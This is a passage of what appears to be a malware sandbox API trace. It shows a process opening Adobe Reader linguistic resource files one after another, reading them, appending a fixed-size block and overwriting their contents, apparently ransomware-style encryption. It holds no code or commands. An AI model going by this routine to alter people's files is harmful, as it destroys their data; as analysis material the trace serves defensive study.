hFile=0x1fc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.298] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0098.298] WriteFile (in: hFile=0x1fc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.298] CloseHandle (hObject=0x1fc) returned 1 [0098.299] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin49.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin49.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.105] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.105] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa5400 [0114.105] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.105] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.105] ReleaseMutex (hMutex=0x168) returned 1 [0114.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fin49.lex", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fin49.lex", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fin49.lex", lpUsedDefaultChar=0x0) returned 9 [0114.114] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0114.143] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.246] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa4400 [0114.246] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.312] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa4400 [0114.313] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.313] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0114.313] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0114.314] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.314] CloseHandle (hObject=0x20c) returned 1 [0114.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.316] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.316] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x800 [0114.316] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.316] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.316] ReleaseMutex (hMutex=0x168) returned 1 [0114.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gre.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gre.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gre.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.316] ReadFile (in: hFile=0x20c, lpBuffer=0x288f968, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x311f2bc*=0x800, lpOverlapped=0x0) returned 1 [0114.386] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0114.386] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0xd88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x311f2d0*=0xd88, lpOverlapped=0x0) returned 1 [0114.386] CloseHandle (hObject=0x20c) returned 1 [0114.386] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.387] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.388] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x270 [0114.388] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.388] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.388] ReleaseMutex (hMutex=0x168) returned 1 [0114.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="heb.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="heb.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="heb.fca", lpUsedDefaultChar=0x0) returned 7 [0114.388] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x311f2bc*=0x270, lpOverlapped=0x0) returned 1 [0114.389] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0114.389] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7f8, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x311f2d0*=0x7f8, lpOverlapped=0x0) returned 1 [0114.390] CloseHandle (hObject=0x20c) returned 1 [0114.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.391] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.391] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x45c [0114.391] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.391] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.391] ReleaseMutex (hMutex=0x168) returned 1 [0114.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hun.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hun.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hun.fca", lpUsedDefaultChar=0x0) returned 7 [0114.392] ReadFile (in: hFile=0x20c, lpBuffer=0x269c668, nNumberOfBytesToRead=0x45c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x45c, lpOverlapped=0x0) returned 1 [0114.420] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0114.420] WriteFile (in: hFile=0x20c, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0x9e4, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x311f2d0*=0x9e4, lpOverlapped=0x0) returned 1 [0114.421] CloseHandle (hObject=0x20c) returned 1 [0114.421] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl61.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl61.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.422] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.423] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2e000 [0114.423] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.423] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.423] ReleaseMutex (hMutex=0x168) returned 1 [0114.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl61.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl61.ths", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="itl61.ths", lpUsedDefaultChar=0x0) returned 9 [0114.423] ReadFile (in: hFile=0x20c, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.474] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2d000 [0114.474] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.478] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2d000 [0114.479] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.479] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0114.479] WriteFile (in: hFile=0x20c, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.480] CloseHandle (hObject=0x20c) returned 1 [0114.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\litphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\litphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.481] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.481] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa58 [0114.481] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.482] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.482] ReleaseMutex (hMutex=0x168) returned 1 [0114.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="litphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="litphon.env", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="litphon.env", lpUsedDefaultChar=0x0) returned 11 [0114.482] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0xa58, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x311f2bc*=0xa58, lpOverlapped=0x0) returned 1 [0114.491] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0114.491] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea99e8*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesWritten=0x311f2d0*=0xfe0, lpOverlapped=0x0) returned 1 [0114.492] CloseHandle (hObject=0x20c) returned 1 [0114.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn16.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn16.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.493] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.493] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3bfc [0114.493] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.493] ReleaseMutex (hMutex=0x168) returned 1 [0114.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nyn16.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nyn16.clx", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nyn16.clx", lpUsedDefaultChar=0x0) returned 9 [0114.494] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.506] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2bfc [0114.506] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.520] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2bfc [0114.521] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.522] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0114.522] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea99e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.522] CloseHandle (hObject=0x20c) returned 1 [0114.522] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.523] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.524] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7fec [0114.524] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.524] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.524] ReleaseMutex (hMutex=0x168) returned 1 [0114.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prt32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prt32.clx", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prt32.clx", lpUsedDefaultChar=0x0) returned 9 [0114.524] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.772] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6fec [0114.773] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.789] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6fec [0114.789] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.790] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0114.790] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea99e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.790] CloseHandle (hObject=0x20c) returned 1 [0114.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus101.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus101.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.793] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.793] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x70ad2 [0114.793] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.793] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.793] ReleaseMutex (hMutex=0x168) returned 1 [0114.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rus101.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rus101.hsp", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 